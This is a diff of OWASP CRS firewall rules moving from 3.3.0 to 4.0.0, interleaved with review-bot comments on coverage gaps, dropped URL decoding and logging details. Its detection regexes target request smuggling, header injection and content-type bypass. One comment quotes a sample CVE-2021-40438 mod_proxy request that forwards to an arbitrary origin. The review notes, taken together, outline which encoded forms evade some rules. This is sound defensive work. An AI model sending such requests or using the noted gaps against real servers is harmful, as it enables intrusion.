@@ -1469,11 +1783,11 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'WARNING',\ chain" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ - "setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}'" + "setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}'" # @@ -1496,16 +1810,16 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90 tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # This is a stricter sibling of 920270. # -SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ +SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:Sec-Fetch-User|!REQUEST_HEADERS:Sec-CH-UA|!REQUEST_HEADERS:Sec-CH-UA-Mobile "@validateByteRange 32,34,38,42-59,61,65-90,95,97-122" \ "id:920274,\ - phase:2,\ + phase:1,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request headers (outside of very strict set)',\ 
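Review bot: 920274 now excludes `Sec-CH-UA` (together with `Sec-CH-UA-Mobile`) from the strict byte-range check, but the replacement rule 920275 in the next hunk only covers the two boolean headers `Sec-Fetch-User` and `Sec-CH-UA-Mobile`, so `Sec-CH-UA` is no longer inspected by any rule in this PL4 group. Its value is a Structured Field list of quoted strings with parameters (of the form `"Brand";v="99", ...`), which legitimately contains `"`, `;`, `=` and parentheses and so cannot use the 920274 range; the consistent fix is a third sibling for `REQUEST_HEADERS:Sec-CH-UA` with a `!@rx` grammar check, or at minimum a comment on 920274 stating that Sec-CH-UA is intentionally left unchecked. The 920274 rule continues into the next hunk.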
@@ -1517,19 +1831,21 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # # This is a stricter sibling of 920270. -# The 'Sec-Fetch-User' header may contain the '?' (63) character. -# Therefore we exclude this header from rule 920274 which forbids '?'. -# https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user +# The headers of this rule are Structured Header booleans, for which only `?0`, +# and `?1` are inconspicuous. +# Structured Header boolean: https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-header-structure-19#section-3.3.6 +# Sec-Fetch-User: https://www.w3.org/TR/fetch-metadata/#http-headerdef-sec-fetch-user +# Sec-CH-UA-Mobile: https://wicg.github.io/ua-client-hints/#sec-ch-ua-mobile # -SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63,65-90,95,97-122" \ +SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(?:\?[01])?$" \ "id:920275,\ - phase:2,\ + phase:1,\ block,\ t:none,t:urlDecodeUni,\ msg:'Invalid character in request headers (outside of very strict set)',\ @@ -1541,9 +1857,9 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63, tag:'OWASP_CRS',\ tag:'capec/1000/210/272',\ tag:'paranoia-level/4',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # -=[ Abnormal Character Escapes ]=- # 
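Review bot: 920275 is now a grammar check (`!@rx ^(?:\?[01])?$`) rather than a byte-range check, but its unchanged `msg:'Invalid character in request headers (outside of very strict set)'` still describes the old behaviour and is identical to 920274's, so the two alerts are indistinguishable in the log; something like `msg:'Invalid value in Structured Header boolean request header'` with `logdata:'%{MATCHED_VAR_NAME}: %{MATCHED_VAR}'` would say what actually failed. The new comment cites `draft-ietf-httpbis-header-structure-19`; that draft was published as RFC 8941, which is the stable reference to link. `t:urlDecodeUni` is kept for a header whose grammar is two literal tokens; it is harmless but means `%3F1` is accepted as `?1`, which is worth a conscious decision. The rule's tags and setvar continue in the next hunk.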
@@ -1570,13 +1886,12 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User "@validateByteRange 32,34,38,42-59,61,63, # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdeghijklmpqwxyz123456789]" \ +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdeghijklmpqwxyz123456789]" \ "id:920460,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ - log,\ + t:none,t:htmlEntityDecode,t:lowercase,\ msg:'Abnormal character escapes in request',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -1586,11 +1901,10 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\\\\])\\\\[cdegh tag:'paranoia-level/4',\ tag:'OWASP_CRS',\ tag:'capec/1000/153/267',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl4=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" # diff --git a/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/REQUEST-921-PROTOCOL-ATTACK.conf index 9861144ef2..545d52fd0c 100644 --- a/rules/REQUEST-921-PROTOCOL-ATTACK.conf +++ b/rules/REQUEST-921-PROTOCOL-ATTACK.conf 
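Review bot: 920460 drops `t:urlDecodeUni` while keeping `REQUEST_URI` and `REQUEST_HEADERS` as targets; as far as I can tell those variables are not decoded by the engine the way `ARGS` is, so a percent-encoded backslash (`%5C`) in the path part of the URI is no longer seen as `\` by this rule, and only the decoded `ARGS`/`ARGS_NAMES` copy of a query-string payload remains covered. The same transformation removal is applied to the request-smuggling, response-splitting and header-injection rules in REQUEST-921-PROTOCOL-ATTACK.conf (hunks on lines 328-331). If this is a deliberate move away from double decoding, a short header comment such as `# t:urlDecodeUni intentionally not applied: ARGS are already decoded by the engine; encoded escapes in the raw path are not in scope of this rule` plus a regression test with an encoded payload in the path would record the trade-off. The removed `log` and `ctl:auditLogParts=+E` look like the default-action cleanup done across the file.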
@@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ @@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # 
@@ -30,12 +31,12 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAf # [ References ] # http://projects.webappsec.org/HTTP-Request-Smuggling # -SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+(?:\/|\w)[^\s]*(?:\s+http\/\d|[\r\n])" \ +SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+[^\s]+\s+http/\d" \ "id:921110,\ phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ + t:none,t:htmlEntityDecode,t:lowercase,\ msg:'HTTP Request Smuggling Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -45,18 +46,17 @@ SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connec tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ HTTP Response Splitting ]=- # # [ Rule Logic ] # These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters. -# These characters may cause problems if the data is returned in a respones header and +# These characters may cause problems if the data is returned in a response header and # may be interpreted by an intermediary proxy server and treated as two separate # responses. # 
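Review bot: The new 921110 regex `...\s+[^\s]+\s+http/\d` requires an explicit `http/<digit>` after the target, whereas the old pattern also accepted a method and target terminated by `[\r\n]`; a smuggled request line without a protocol version (HTTP/0.9 style) inside a body or argument therefore no longer matches at PL1. The loosening from `(?:\/|\w)[^\s]*` to `[^\s]+` is a reasonable simplification since the version suffix now anchors the match. If dropping the version-less form is intentional to cut false positives on two-word prose followed by a line break, the rule comment should record that so the coverage change is not mistaken for an oversight. `t:urlDecodeUni` is removed here as well, so `REQUEST_BODY` is matched without decoding; a test with a percent-encoded request line in a form body would show whether that is still caught via `ARGS`.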
@@ -68,7 +68,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,\ + t:none,t:lowercase,\ msg:'HTTP Response Splitting Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -78,11 +78,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \ @@ -90,7 +89,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\ + t:none,t:htmlEntityDecode,t:lowercase,\ msg:'HTTP Response Splitting Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ @@ -100,11 +99,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/34',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ HTTP Header Injection ]=- 
@@ -122,7 +120,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 #
 SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
 "id:921140,\
- phase:2,\
+ phase:1,\
 block,\
 capture,\
 t:none,t:htmlEntityDecode,\
@@ -135,11 +133,10 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/210/272/220/273',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 # Detect newlines in argument names.
@@ -154,7 +151,7 @@ SecRule ARGS_NAMES "@rx [\n\r]" \
 phase:2,\
 block,\
 capture,\
- t:none,t:urlDecodeUni,t:htmlEntityDecode,\
+ t:none,t:htmlEntityDecode,\
 msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
@@ -164,11 +161,10 @@ SecRule ARGS_NAMES "@rx [\n\r]" \
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/210/272/220/33',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\s*:" \
@@ -176,7 +172,7 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook
 phase:1,\
 block,\
 capture,\
- t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
+ t:none,t:htmlEntityDecode,t:lowercase,\
 msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
@@ -186,17 +182,17 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/210/272/220/33',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 # -=[ HTTP Splitting ]=-
 #
 # This rule detect \n or \r in the REQUEST FILENAME
-# Reference: https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
+# Reference: https://wiki.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
+# Reference: https://owasp.org/www-project-web-security-testing-guide/assets/archive/OWASP_Testing_Guide_v4.pdf
 #
 SecRule REQUEST_FILENAME "@rx [\n\r]" \
 "id:921190,\
@@ -212,11 +208,10 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/210/272/220/34',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 #
@@ -229,7 +224,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \ # # [ References ] # * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf -# * https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ +# * https://www.sonarsource.com/blog/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ # * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!\<\>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!\<\>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!\<\>\~]+[><~]?=[^:\(\)\&\|\!\<\>\~]*)" \ 
@@ -243,18 +238,77 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'application-multi',\
 tag:'language-ldap',\
 tag:'platform-multi',\
+ tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/248/136',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ Body Processor Bypass ]=-
+#
+# [ Rule Logic ]
+#
+# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration.
+# This prevents bypasses targeting the Modsecurity recommended rules controlling which body processor is used.
+#
+# Regular expression generated from regex-assembly/921421.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 921421
+#
+SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?(?:application/(?:.+\+)?json|(?:application/(?:soap\+)?|text/)xml)" \
+ "id:921421,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'Content-Type header: Dangerous content type outside the mime type declaration',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# Rule against CVE-2021-40438:
+# A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user.
+# This issue affects Apache HTTP Server 2.4.48 and earlier.
+# GET /?unix:AAAAAAAAAAAAA|http://coreruleset.org/
+#
+SecRule REQUEST_URI "@rx unix:[^|]*\|" \
+ "id:921240,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,t:urlDecode,t:lowercase,\
+ msg:'mod_proxy attack attempt detected',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-apache',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/33',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 #
-# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -266,7 +320,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAf
 #
 SecRule ARGS_GET "@rx [\n\r]" \
 "id:921151,\
- phase:2,\
+ phase:1,\
 block,\
 capture,\
 t:none,t:urlDecodeUni,t:htmlEntityDecode,\
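Review bot: The two new PL1 rules 921421 and 921240 add only to `tx.inbound_anomaly_score_pl1`, whereas every other `attack-protocol` rule in these hunks (921110 through 921190) also carries `setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\`; if that category score is what the reporting rules aggregate for protocol attacks, the new rules should bump it as well, otherwise a comment should say why they are excluded. The CVE-2021-40438 header comment also has a typo, `choosen` → `chosen`. Since REQUEST_URI is not engine-decoded, the `t:urlDecode` on 921240 is load-bearing, and a one-line comment such as `# REQUEST_URI is not decoded by the engine, so decode it here before matching the unix: prefix` would stop a later cleanup from removing it the way this commit removes `t:urlDecodeUni` elsewhere.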
@@ -279,19 +333,82 @@ SecRule ARGS_GET "@rx [\n\r]" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/210/272/220/33',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# +# -=[ Body Processor Bypass ]=- +# +# [ Rule Logic ] +# +# This rule intends to detect content types in the Content-Type header outside of the actual content type declaration. +# +# [ References ] +# * See rule 921422 +# +# Regular expression generated from regex-assembly/921422.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 921422 +# +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\v,;]+[\s\v,;].*?\b(?:((?:tex|multipar)t|application)|((?:audi|vide)o|image|cs[sv]|(?:vn|relate)d|p(?:df|lain)|json|(?:soa|cs)p|x(?:ml|-www-form-urlencoded)|form-data|x-amf|(?:octe|repor)t|stream)|([\+/]))\b" \ + "id:921422,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Type header: Dangerous content type outside the mime type declaration',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule 
TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+#
+# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
+#
 #
-# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+
+# Forbid Request Range Header
 #
+# It is possible abuse the HTTP Request Range Header to leak error pages
+# and other information in very small snippets.
+# The easiest way to fight this is to deny the use of this header.
+# This is a viable option since the header is only used in rare circumstances
+# anymore.
+# If it is necessary to use it in a certain setup, then it is best to
+# create a rule exclusion for a given URI and this rule ID as a workaround.
 #
+SecRule &REQUEST_HEADERS:Range "@gt 0" \
+ "id:921230,\
+ phase:1,\
+ block,\
+ t:none,\
+ msg:'HTTP Range Header detected',\
+ logdata:'Matched Data: Header %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/3',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
 # -=[ HTTP Parameter Pollution ]=-
 #
@@ -320,10 +437,9 @@ SecRule ARGS_NAMES "@rx ." \
 tag:'language-multi',\
 tag:'platform-multi',\
 tag:'attack-protocol',\
- tag:'paranoia-level/3',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/137/15/460',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"
 SecRule TX:/paramcounter_.*/ "@gt 1" \
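Review bot: In the new 921230 the target is the counted variable `&REQUEST_HEADERS:Range`, so, as far as I can tell from how ModSecurity handles the `&` count operator, `%{MATCHED_VAR}` in its logdata expands to the count (normally `1`) rather than to the Range value, and the audit log will not show what range was requested; `logdata:'Matched Data: Header Range: %{REQUEST_HEADERS.Range}',\` would log the actual header. The `[ References ]` block of 921422 points at itself (`* See rule 921422`) and presumably means the PL1 sibling 921421. The comment's claim that Range is "only used in rare circumstances" undersells its routine use by media players, PDF viewers and resumable downloads; at PL3 the rule is defensible, but the comment should say plainly that any streaming or large-download endpoint behind the WAF will need the exclusion.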
@@ -339,21 +455,103 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \
 tag:'OWASP_CRS',\
 tag:'capec/1000/152/137/15/460',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 chain"
 SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \
 "capture,\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
